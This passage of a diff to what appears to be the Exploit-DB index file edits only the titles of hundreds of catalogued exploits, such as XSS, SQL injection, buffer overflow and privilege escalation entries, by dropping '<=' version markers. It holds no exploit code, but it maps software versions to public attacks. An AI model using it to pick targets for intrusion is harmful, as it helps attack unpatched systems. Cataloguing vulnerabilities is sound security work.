Vulnerabilities",2009-06-08,kingcope,linux,dos,0 32971,platforms/multiple/remote/32971.txt,"Glassfish Enterprise Server 2.1 Admin Console /applications/applications.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 33577,platforms/multiple/remote/33577.txt,"XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities",2009-06-10,MustLive,multiple,remote,0 33352,platforms/windows/remote/33352.py,"Easy File Sharing Web Server 6.8 - Stack Buffer Overflow",2014-05-14,superkojiman,windows,remote,80 @@ -29752,35 +29752,35 @@ id,file,description,date,author,platform,type,port 32991,platforms/php/webapps/32991.txt,"Claroline 1.8.11 - 'claroline/linker/notfound.php' Cross-Site Scripting",2009-05-08,"Gerendi Sandor Attila",php,webapps,0 32992,platforms/php/webapps/32992.txt,"MagpieRSS 0.72 - Cross-Site Scripting And HTML Injection Vulnerabilities",2009-05-08,"Justin Klein Keane",php,webapps,0 32993,platforms/php/webapps/32993.txt,"Dacio's Image Gallery 1.6 - Multiple Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0 -32994,platforms/multiple/remote/32994.xml,"Apple Safari <= 3.2.2 - 'feed:' URI Multiple Input Validation Vulnerabilities",2009-05-12,"Billy Rios",multiple,remote,0 +32994,platforms/multiple/remote/32994.xml,"Apple Safari 3.2.2 - 'feed:' URI Multiple Input Validation Vulnerabilities",2009-05-12,"Billy Rios",multiple,remote,0 32995,platforms/linux/dos/32995.txt,"Sendmail 8.12.x - 'X-header' Remote Heap Buffer Overflow",2009-05-27,"Simple Nomad",linux,dos,0 32996,platforms/multiple/remote/32996.txt,"Nortel Contact Center Manager Administration Password Disclosure",2009-05-14,"Bernhard Muller",multiple,remote,0 32999,platforms/php/webapps/32999.py,"Bonefire 0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Ince",php,webapps,0 33057,platforms/php/webapps/33057.txt,"Aardvark Topsites PHP 5.2 - 'index.php' Cross-Site Scripting",2009-05-26,anonymous,php,webapps,0 -33000,platforms/php/webapps/33000.txt,"Cacti <= 0.8.7 - 'data_input.php' Cross-Site Scripting",2009-05-15,fgeek,php,webapps,0 +33000,platforms/php/webapps/33000.txt,"Cacti 0.8.7 - 'data_input.php' Cross-Site Scripting",2009-05-15,fgeek,php,webapps,0 33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 - Cross-Site scripting and Remote Command Execution",2009-05-20,inking,php,webapps,0 33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 Web Application Firewall Security Bypass Vulnerabilities",2009-05-20,EnableSecurity,php,webapps,0 33003,platforms/php/webapps/33003.txt,"WordPress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 (dompdf.php read param) - Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 33006,platforms/php/webapps/33006.txt,"AlienVault 4.3.1 - Unauthenticated SQL Injection",2014-04-24,"Sasha Zivojinovic",php,webapps,443 -33007,platforms/multiple/remote/33007.txt,"Novell GroupWise <= 8.0 WebAccess Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0 +33007,platforms/multiple/remote/33007.txt,"Novell GroupWise 8.0 WebAccess Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0 33008,platforms/php/webapps/33008.txt,"LxBlog Multiple Cross-Site Scripting and SQL Injection Vulnerabilities",2009-05-22,Securitylab.ir,php,webapps,0 -33009,platforms/asp/webapps/33009.txt,"DotNetNuke <= 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting",2009-05-22,"ben hawkes",asp,webapps,0 +33009,platforms/asp/webapps/33009.txt,"DotNetNuke 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting",2009-05-22,"ben hawkes",asp,webapps,0 33010,platforms/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 Log File Remote Format String",2009-05-26,lofi42,hardware,remote,0 33011,platforms/php/webapps/33011.txt,"PHP-Nuke 8.0 - 'main/tracking/userLog.php' SQL Injection",2009-05-27,"Gerendi Sandor Attila",php,webapps,0 33012,platforms/windows/local/33012.c,"Microsoft Windows 2000/XP/2003 - Desktop Wall Paper System Parameter Local Privilege Escalation",2009-02-02,Arkon,windows,local,0 33013,platforms/php/webapps/33013.txt,"Lussumo Vanilla 1.1.5/1.1.7 - 'updatecheck.php' Cross-Site Scripting",2009-05-15,"Gerendi Sandor Attila",php,webapps,0 -33014,platforms/php/webapps/33014.txt,"Achievo <= 1.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0 +33014,platforms/php/webapps/33014.txt,"Achievo 1.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-28,MaXe,php,webapps,0 33015,platforms/linux/dos/33015.c,"Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service",2009-05-29,"Miklos Szeredi",linux,dos,0 33016,platforms/hardware/remote/33016.txt,"SonicWALL SSL-VPN 'cgi-bin/welcome/VirtualOffice' Remote Format String",2009-05-29,"Patrick Webster",hardware,remote,0 -33017,platforms/linux/dos/33017.txt,"Adobe Acrobat <= 9.1.3 - Stack Exhaustion Denial of Service",2009-05-29,"Saint Patrick",linux,dos,0 +33017,platforms/linux/dos/33017.txt,"Adobe Acrobat 9.1.3 - Stack Exhaustion Denial of Service",2009-05-29,"Saint Patrick",linux,dos,0 33018,platforms/windows/dos/33018.txt,"cFos Personal Net 3.09 - Remote Heap Memory Corruption Denial of Service",2014-04-25,LiquidWorm,windows,dos,0 33019,platforms/multiple/webapps/33019.txt,"miSecureMessages 4.0.1 - Session Management & Authentication Bypass Vulnerabilities",2014-04-25,"Jared Bird",multiple,webapps,0 -33020,platforms/linux/dos/33020.py,"CUPS <= 1.3.9 - 'cups/ipp.c' NULL Pointer Dereference Denial Of Service",2009-06-02,"Anibal Sacco",linux,dos,0 +33020,platforms/linux/dos/33020.py,"CUPS 1.3.9 - 'cups/ipp.c' NULL Pointer Dereference Denial Of Service",2009-06-02,"Anibal Sacco",linux,dos,0 33021,platforms/php/webapps/33021.txt,"PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross-Site Scripting",2009-06-02,"Schap Security",php,webapps,0 33022,platforms/php/webapps/33022.txt,"Joomla! < 1.5.11 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2009-06-03,"Airton Torres",php,webapps,0 -33023,platforms/multiple/remote/33023.txt,"Apache Tomcat <= 6.0.18 Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0 +33023,platforms/multiple/remote/33023.txt,"Apache Tomcat 6.0.18 Form Authentication Existing/Non-Existing Username Enumeration Weakness",2009-06-03,"D. Matscheko",multiple,remote,0 33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0 33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 - 'cfgadvanced.html' HTTP Header Injection",2009-06-05,Inferno,windows,remote,0 33026,platforms/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps,0 @@ -29792,39 +29792,39 @@ id,file,description,date,author,platform,type,port 33033,platforms/multiple/remote/33033.html,"WebKit JavaScript 'onload()' Event Cross Domain Scripting",2009-05-08,"Michal Zalewski",multiple,remote,0 33034,platforms/linux/remote/33034.txt,"WebKit XML External Entity Information Disclosure",2009-05-08,"Chris Evans",linux,remote,0 33035,platforms/windows/remote/33035.txt,"Microsoft Windows Media Player 11 ScriptCommand Multiple Information Disclosure Vulnerabilities",2009-05-12,"Rosario Valotta",windows,remote,0 -33036,platforms/linux/dos/33036.txt,"Git <= 1.6.3 Parameter Processing Remote Denial Of Service",2009-05-05,"Shawn O. Pearce",linux,dos,0 -33037,platforms/multiple/dos/33037.html,"Apple QuickTime <= 7.4.1 NULL Pointer Dereference Denial of Service",2009-05-14,"Thierry Zoller",multiple,dos,0 +33036,platforms/linux/dos/33036.txt,"Git 1.6.3 Parameter Processing Remote Denial Of Service",2009-05-05,"Shawn O. Pearce",linux,dos,0 +33037,platforms/multiple/dos/33037.html,"Apple QuickTime 7.4.1 NULL Pointer Dereference Denial of Service",2009-05-14,"Thierry Zoller",multiple,dos,0 33038,platforms/php/webapps/33038.txt,"Webmedia Explorer 5.0.9/5.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-15,intern0t,php,webapps,0 -33039,platforms/linux/remote/33039.txt,"Mozilla Firefox <= 3.0.10 and SeaMonkey <= 1.1.16 Address Bar URI Spoofing",2009-05-11,"Pavel Cvrcek",linux,remote,0 +33039,platforms/linux/remote/33039.txt,"Mozilla Firefox 3.0.10 and SeaMonkey 1.1.16 Address Bar URI Spoofing",2009-05-11,"Pavel Cvrcek",linux,remote,0 33040,platforms/linux/dos/33040.txt,"GUPnP 0.12.7 Message Handling Denial Of Service",2009-05-03,"Zeeshan Ali",linux,dos,0 -33041,platforms/linux/dos/33041.txt,"Irssi <= 0.8.13 - 'WALLOPS' Message Off By One Heap Memory Corruption",2009-05-15,nemo,linux,dos,0 -33042,platforms/linux/dos/33042.txt,"Mozilla Firefox <= 3.0.10 - 'nsViewManager.cpp' Denial of Service",2009-05-11,"Bret McMillan",linux,dos,0 +33041,platforms/linux/dos/33041.txt,"Irssi 0.8.13 - 'WALLOPS' Message Off By One Heap Memory Corruption",2009-05-15,nemo,linux,dos,0 +33042,platforms/linux/dos/33042.txt,"Mozilla Firefox 3.0.10 - 'nsViewManager.cpp' Denial of Service",2009-05-11,"Bret McMillan",linux,dos,0 33043,platforms/linux/dos/33043.txt,"Linux Kernel 2.6.x - '/proc/iomem' Sparc64 Local Denial of Service",2009-05-03,"Mikulas Patocka",linux,dos,0 -33044,platforms/hardware/remote/33044.html,"Apple iPhone <= 2.2.1 - Call Approval Dialog Security Bypass (1)",2009-05-17,"Collin Mulliner",hardware,remote,0 -33045,platforms/hardware/remote/33045.html,"Apple iPhone <= 2.2.1 - Call Approval Dialog Security Bypass (2)",2009-05-17,"Collin Mulliner",hardware,remote,0 -33046,platforms/hardware/remote/33046.html,"Apple iPhone <= 2.2.1 - Call Approval Dialog Security Bypass (3)",2009-05-17,"Collin Mulliner",hardware,remote,0 +33044,platforms/hardware/remote/33044.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (1)",2009-05-17,"Collin Mulliner",hardware,remote,0 +33045,platforms/hardware/remote/33045.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (2)",2009-05-17,"Collin Mulliner",hardware,remote,0 +33046,platforms/hardware/remote/33046.html,"Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (3)",2009-05-17,"Collin Mulliner",hardware,remote,0 33047,platforms/multiple/remote/33047.html,"WebKit 'parent/top' Cross Domain Scripting",2009-05-19,"Gareth Hayes",multiple,remote,0 -33048,platforms/java/webapps/33048.txt,"DirectAdmin <= 1.33.6 - 'CMD_REDIRECT' Cross-Site Scripting",2009-05-19,r0t,java,webapps,0 +33048,platforms/java/webapps/33048.txt,"DirectAdmin 1.33.6 - 'CMD_REDIRECT' Cross-Site Scripting",2009-05-19,r0t,java,webapps,0 33049,platforms/linux/dos/33049.txt,"LibTIFF 3.8.2 - 'LZWDecodeCompat()' Remote Buffer Underflow",2009-05-21,wololo,linux,dos,0 33050,platforms/windows/remote/33050.html,"Microsoft Internet Explorer 7/8 HTML Attribute JavaScript URI Security Bypass",2009-05-22,80vul,windows,remote,0 -33051,platforms/cgi/remote/33051.txt,"Nagios <= 3.0.6 - 'statuswml.cgi' Remote Arbitrary Shell Command Injection",2009-05-22,Paul,cgi,remote,0 -33052,platforms/php/webapps/33052.txt,"Basic Analysis And Security Engine <= 1.2.4 - 'readRoleCookie()' Authentication Bypass",2009-05-23,"Tim Medin",php,webapps,0 -33053,platforms/linux/remote/33053.txt,"Samba <= 3.3.5 Format String And Security Bypass Vulnerabilities",2009-05-19,"Jeremy Allison",linux,remote,0 +33051,platforms/cgi/remote/33051.txt,"Nagios 3.0.6 - 'statuswml.cgi' Remote Arbitrary Shell Command Injection",2009-05-22,Paul,cgi,remote,0 +33052,platforms/php/webapps/33052.txt,"Basic Analysis And Security Engine 1.2.4 - 'readRoleCookie()' Authentication Bypass",2009-05-23,"Tim Medin",php,webapps,0 +33053,platforms/linux/remote/33053.txt,"Samba 3.3.5 Format String And Security Bypass Vulnerabilities",2009-05-19,"Jeremy Allison",linux,remote,0 33054,platforms/hardware/remote/33054.txt,"Cisco Adaptive Security Appliance 8.x Web VPN FTP or CIFS Authentication Form Phishing",2009-05-24,"David Byrne",hardware,remote,0 33055,platforms/hardware/remote/33055.html,"Cisco ASA Appliance 8.x WebVPN DOM Wrapper Cross-Site Scripting",2009-05-24,"Trustwave's SpiderLabs",hardware,remote,0 33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - SEH Overflow PoC",2014-04-27,st3n,windows,dos,0 33058,platforms/multiple/dos/33058.txt,"Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0 33059,platforms/windows/dos/33059.smpl,"BaoFeng Storm 3.9.62 Playlist File Buffer Overflow",2009-05-28,Jambalaya,windows,dos,0 -33060,platforms/php/webapps/33060.txt,"phpMyAdmin <= 3.3.0 - 'db' Parameter Cross-Site Scripting",2009-05-30,r0t,php,webapps,0 +33060,platforms/php/webapps/33060.txt,"phpMyAdmin 3.3.0 - 'db' Parameter Cross-Site Scripting",2009-05-30,r0t,php,webapps,0 33061,platforms/php/webapps/33061.php,"Joomla! 1.5.x - Cross-Site Scripting and Information Disclosure Vulnerabilities",2009-06-01,"Juan Galiana Lara",php,webapps,0 33062,platforms/windows/dos/33062.txt,"Apple Safari 4 - 'reload()' Denial of Service",2009-06-02,SkyOut,windows,dos,0 33063,platforms/windows/remote/33063.txt,"Microsoft Internet Explorer 6.0 - 'javascript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,windows,remote,0 -33064,platforms/multiple/remote/33064.txt,"Google Chrome <= 0.3.154 - 'javascript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,multiple,remote,0 +33064,platforms/multiple/remote/33064.txt,"Google Chrome 0.3.154 - 'javascript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,multiple,remote,0 33065,platforms/php/webapps/33065.txt,"Horde 3.1 - 'Passwd' Module Cross-Site Scripting",2009-06-05,anonymous,php,webapps,0 33066,platforms/windows/remote/33066.html,"Avax Vector 1.3 - 'avPreview.ocx' ActiveX Control Buffer Overflow",2009-06-06,Satan_HackerS,windows,remote,0 33067,platforms/multiple/remote/33067.txt,"Winds3D Viewer 3 - 'GetURL()' Arbitrary File Download",2009-06-08,"Diego Juarez",multiple,remote,0 33068,platforms/php/webapps/33068.txt,"ClanSphere 2009 - 'text' Parameter Cross-Site Scripting",2009-06-06,"599eme Man",php,webapps,0 -33069,platforms/windows/local/33069.rb,"Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow",2014-04-28,Metasploit,windows,local,0 +33069,platforms/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow",2014-04-28,Metasploit,windows,local,0 33070,platforms/php/webapps/33070.py,"ApPHP MicroBlog 1.0.1 - Remote Command Execution Exploit",2014-04-28,LOTFREE,php,webapps,80 33071,platforms/windows/remote/33071.txt,"McAfee ePolicy Orchestrator 4.6.0-4.6.5 (ePowner) - Multiple Vulnerabilities",2014-04-28,st3n,windows,remote,0 33072,platforms/php/webapps/33072.txt,"Adem 0.5.1 - Local File Inclusion",2014-04-28,JIKO,php,webapps,80 @@ -29849,7 +29849,7 @@ id,file,description,date,author,platform,type,port 33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Buffer Overflow",2009-11-12,HACKATTACK,novell,remote,0 33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 Information Disclosure",2009-11-06,"Daniel King",jsp,webapps,0 33348,platforms/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - DoS PoC",2014-05-14,"Martinez FrostCard",windows,dos,0 -33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Include",2009-07-16,MustLive,multiple,remote,0 +33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,multiple,remote,0 33579,platforms/multiple/dos/33579.txt,"Ingres Database 9.3 Heap Buffer Overflow",2010-01-29,"Evgeny Legerov",multiple,dos,0 33580,platforms/hardware/remote/33580.txt,"Comtrend CT-507 IT ADSL Router 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,hardware,remote,0 33095,platforms/windows/remote/33095.rb,"Adobe Flash Player Type Confusion Remote Code Execution",2014-04-29,Metasploit,windows,remote,0 @@ -29858,9 +29858,9 @@ id,file,description,date,author,platform,type,port 33098,platforms/php/webapps/33098.txt,"Programs Rating postcomments.php id Parameter XSS",2009-06-20,Moudi,php,webapps,0 33099,platforms/multiple/dos/33099.txt,"World in Conflict 1.0.1 Typecheck Remote Denial of Service",2009-06-16,"Luigi Auriemma",multiple,dos,0 33100,platforms/multiple/dos/33100.txt,"S.T.A.L.K.E.R. Clear Sky 1.0010 - Remote Denial of Service",2009-06-22,"Luigi Auriemma",multiple,dos,0 -33101,platforms/linux/dos/33101.txt,"Mozilla Firefox <= 3.0.11 and Thunderbird <= 2.0.9 - RDF File Handling Remote Memory Corruption",2009-06-21,"Christophe Charron",linux,dos,0 +33101,platforms/linux/dos/33101.txt,"Mozilla Firefox 3.0.11 and Thunderbird 2.0.9 - RDF File Handling Remote Memory Corruption",2009-06-21,"Christophe Charron",linux,dos,0 33102,platforms/php/webapps/33102.txt,"CommuniGate Pro 5.2.14 Web Mail URI Parsing HTML Injection",2009-06-23,"Andrea Purificato",php,webapps,0 -33103,platforms/linux/remote/33103.html,"Mozilla Firefox <= 3.5.1 Error Page Address Bar URI Spoofing",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0 +33103,platforms/linux/remote/33103.html,"Mozilla Firefox 3.5.1 Error Page Address Bar URI Spoofing",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0 33104,platforms/multiple/dos/33104.txt,"Star Wars Battlefront II 1.1 - Remote Denial of Service",2009-06-24,"Luigi Auriemma",multiple,dos,0 33105,platforms/multiple/dos/33105.txt,"TrackMania 2.11.11 - Multiple Remote Vulnerabilities",2009-06-27,"Luigi Auriemma",multiple,dos,0 33106,platforms/php/webapps/33106.txt,"PG MatchMaking browse_ladies.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0 @@ -29868,7 +29868,7 @@ id,file,description,date,author,platform,type,port 33108,platforms/php/webapps/33108.txt,"PG MatchMaking search.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0 33109,platforms/php/webapps/33109.txt,"PG MatchMaking services.php show Parameter XSS",2009-06-24,Moudi,php,webapps,0 33110,platforms/php/webapps/33110.txt,"XZeroScripts XZero Community Classifieds 4.97.8 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-24,Moudi,php,webapps,0 -33111,platforms/php/webapps/33111.txt,"AIOCP 1.4 - 'cp_html2txt.php' Remote File Include",2009-06-27,"Hadi Kiamarsi",php,webapps,0 +33111,platforms/php/webapps/33111.txt,"AIOCP 1.4 - 'cp_html2txt.php' Remote File Inclusion",2009-06-27,"Hadi Kiamarsi",php,webapps,0 33112,platforms/php/webapps/33112.txt,"PG Roommate Finder Solution - quick_search.php part Parameter XSS",2009-06-27,Moudi,php,webapps,0 33113,platforms/php/webapps/33113.txt,"PG Roommate Finder Solution - viewprofile.php part Parameter XSS",2009-06-27,Moudi,php,webapps,0 33114,platforms/php/webapps/33114.txt,"Almond Classifieds Component for Joomla! 7.5 - Cross-Site Scripting and SQL-Injection Vulnerabilities",2009-06-27,Moudi,php,webapps,0 @@ -29892,8 +29892,8 @@ id,file,description,date,author,platform,type,port 33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)",2009-06-30,"Ivan Sanchez",php,webapps,0 33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 \\\'op\\\' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0 33132,platforms/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,php,webapps,0 -33133,platforms/multiple/dos/33133.txt,"Adobe Flash Player <= 10.0.22 and AIR URI Parsing Heap Buffer Overflow",2009-07-30,iDefense,multiple,dos,0 -33134,platforms/linux/dos/33134.txt,"Adobe Flash Player <= 10.0.22 and AIR - 'intf_count' Integer Overflow",2009-07-30,"Roee Hay",linux,dos,0 +33133,platforms/multiple/dos/33133.txt,"Adobe Flash Player 10.0.22 and AIR URI Parsing Heap Buffer Overflow",2009-07-30,iDefense,multiple,dos,0 +33134,platforms/linux/dos/33134.txt,"Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow",2009-07-30,"Roee Hay",linux,dos,0 33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution Exploit",2014-05-01,0x4148,hardware,webapps,0 33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 index.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Stored XSS",2014-05-01,"Dolev Farhi",hardware,webapps,0 @@ -29922,10 +29922,10 @@ id,file,description,date,author,platform,type,port 33164,platforms/multiple/remote/33164.txt,"WebKit Floating Point Number Remote Buffer Overflow",2009-08-11,Apple,multiple,remote,0 33165,platforms/hardware/remote/33165.txt,"2Wire Routers 'CD35_SETUP_01' - Access Validation",2009-08-12,hkm,hardware,remote,0 33166,platforms/php/webapps/33166.txt,"Discuz! 6.0 - '2fly_gift.php' SQL Injection",2009-08-15,Securitylab.ir,php,webapps,0 -33167,platforms/cfm/webapps/33167.txt,"Adobe ColdFusion Server <= 8.0.1 - wizards/common/_authenticatewizarduser.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 -33168,platforms/cfm/webapps/33168.txt,"Adobe ColdFusion Server <= 8.0.1 - administrator/logviewer/searchlog.cfm startRow Parameter XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 -33169,platforms/cfm/webapps/33169.txt,"Adobe ColdFusion Server <= 8.0.1 - wizards/common/_logintowizard.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 -33170,platforms/cfm/webapps/33170.txt,"Adobe ColdFusion Server <= 8.0.1 - administrator/enter.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33167,platforms/cfm/webapps/33167.txt,"Adobe ColdFusion Server 8.0.1 - wizards/common/_authenticatewizarduser.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33168,platforms/cfm/webapps/33168.txt,"Adobe ColdFusion Server 8.0.1 - administrator/logviewer/searchlog.cfm startRow Parameter XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33169,platforms/cfm/webapps/33169.txt,"Adobe ColdFusion Server 8.0.1 - wizards/common/_logintowizard.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 +33170,platforms/cfm/webapps/33170.txt,"Adobe ColdFusion Server 8.0.1 - administrator/enter.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0 33171,platforms/asp/webapps/33171.txt,"DUWare DUgallery 3.0 - 'admin/edit.asp' Authentication Bypass",2009-08-17,spymeta,asp,webapps,0 33172,platforms/windows/remote/33172.txt,"Valve Software Source Engine - Format String",2009-08-17,"Luigi Auriemma",windows,remote,0 33173,platforms/windows/dos/33173.html,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (1)",2007-02-07,trevordixon,windows,dos,0 @@ -29945,9 +29945,9 @@ id,file,description,date,author,platform,type,port 33187,platforms/php/webapps/33187.txt,"VideoGirls profile.php profile_name Parameter XSS",2009-08-26,Moudi,php,webapps,0 33188,platforms/php/webapps/33188.txt,"VideoGirls view.php p Parameter XSS",2009-08-26,Moudi,php,webapps,0 33189,platforms/php/webapps/33189.txt,"PHP-Fusion 6.1.18 - Multiple Information Disclosure Vulnerabilities",2009-08-26,Inj3ct0r,php,webapps,0 -33190,platforms/php/webapps/33190.txt,"OpenAutoClassifieds <= 1.5.9 SQL Injection Vulnerabilities",2009-08-25,"Andrew Horton",php,webapps,0 +33190,platforms/php/webapps/33190.txt,"OpenAutoClassifieds 1.5.9 SQL Injection Vulnerabilities",2009-08-25,"Andrew Horton",php,webapps,0 33191,platforms/php/webapps/33191.txt,"FlexCMS 2.5 - 'CookieUsername' Cookie Parameter SQL Injection",2009-08-28,Inj3ct0r,php,webapps,0 -33192,platforms/multiple/remote/33192.php,"Google Chrome <= 6.0.472 - 'Math.Random()' Random Number Generation",2009-08-31,"Amit Klein",multiple,remote,0 +33192,platforms/multiple/remote/33192.php,"Google Chrome 6.0.472 - 'Math.Random()' Random Number Generation",2009-08-31,"Amit Klein",multiple,remote,0 33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x - 'drivers/char/tty_ldisc.c' NULL Pointer Dereference Denial of Service",2009-08-19,"Eric W. Biederman",linux,dos,0 33195,platforms/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,php,webapps,0 33199,platforms/php/webapps/33199.txt,"68 Classifieds 4.1 - searchresults.php page Parameter XSS",2009-07-27,Moudi,php,webapps,0 @@ -29955,7 +29955,7 @@ id,file,description,date,author,platform,type,port 33201,platforms/php/webapps/33201.txt,"68 Classifieds 4.1 viewlisting.php view Parameter XSS",2009-07-27,Moudi,php,webapps,0 33202,platforms/php/webapps/33202.txt,"68 Classifieds 4.1 viewmember.php member Parameter XSS",2009-07-27,Moudi,php,webapps,0 33203,platforms/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x WHERE Clause Secuity Bypass",2009-09-02,"Johannes Dahse",multiple,remote,0 -33204,platforms/php/webapps/33204.txt,"phpAuction 3.2 - 'lan' Parameter Remote File Include",2009-09-09,"Beenu Arora",php,webapps,0 +33204,platforms/php/webapps/33204.txt,"phpAuction 3.2 - 'lan' Parameter Remote File Inclusion",2009-09-09,"Beenu Arora",php,webapps,0 33205,platforms/windows/dos/33205.pl,"Nokia Multimedia Player 1.1 - Remote Denial of Service",2009-09-01,"opt!x hacker",windows,dos,0 33206,platforms/php/webapps/33206.txt,"MKPortal 1.x - Multiple Modules Cross-Site Scripting Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 33207,platforms/windows/remote/33207.txt,"SmartVMD 1.3 - ActiveX Control 'VideoMovementDetection.dll' Buffer Overflow",2009-09-01,"optix hacker",windows,remote,0 @@ -29980,13 +29980,13 @@ id,file,description,date,author,platform,type,port 33226,platforms/php/webapps/33226.txt,"Mega File Hosting Script 1.2 - 'emaillinks.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris Guestbook 'view.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 33228,platforms/linux/dos/33228.txt,"Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow",2009-09-16,"Xiao Guangrong",linux,dos,0 -33229,platforms/bsd/local/33229.c,"NetBSD <= 5.0.1 - 'IRET' General Protection Fault Handling Local Privilege Escalation",2009-09-16,"Tavis Ormandy",bsd,local,0 +33229,platforms/bsd/local/33229.c,"NetBSD 5.0.1 - 'IRET' General Protection Fault Handling Local Privilege Escalation",2009-09-16,"Tavis Ormandy",bsd,local,0 33230,platforms/linux/dos/33230.txt,"GNU glibc 2.x - 'strfmon()' Function Integer Overflow Weakness",2009-09-17,"Maksymilian Arciemowicz",linux,dos,0 33231,platforms/cgi/webapps/33231.txt,"Avaya Intuity Audix LX R1.1 - Multiple Remote Vulnerabilities",2009-09-18,pagvac,cgi,webapps,0 33232,platforms/php/webapps/33232.txt,"MyBB 1.4.8 - 'search.php' SQL Injection",2009-09-19,$qL_DoCt0r,php,webapps,0 33233,platforms/linux/dos/33233.txt,"FFmpeg 0.5 - Multiple Remote Vulnerabilities",2009-09-21,"Will Dormann",linux,dos,0 33234,platforms/hardware/remote/33234.txt,"Check Point Connectra R62 - '/Login/Login' Arbitrary Script Injection",2009-09-21,"Stefan Friedli",hardware,remote,0 -33235,platforms/osx/dos/33235.rb,"Apple iTunes <= 9.0 - (.pls) Buffer Overflow",2009-09-22,"Roger Hart",osx,dos,0 +33235,platforms/osx/dos/33235.rb,"Apple iTunes 9.0 - (.pls) Buffer Overflow",2009-09-22,"Roger Hart",osx,dos,0 33236,platforms/asp/webapps/33236.txt,"MaxWebPortal 1.365 - 'forum.asp' SQL Injection",2009-09-22,OoN_Boy,asp,webapps,0 33237,platforms/php/webapps/33237.txt,"Joomla! SportFusion 0.2.x Component SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 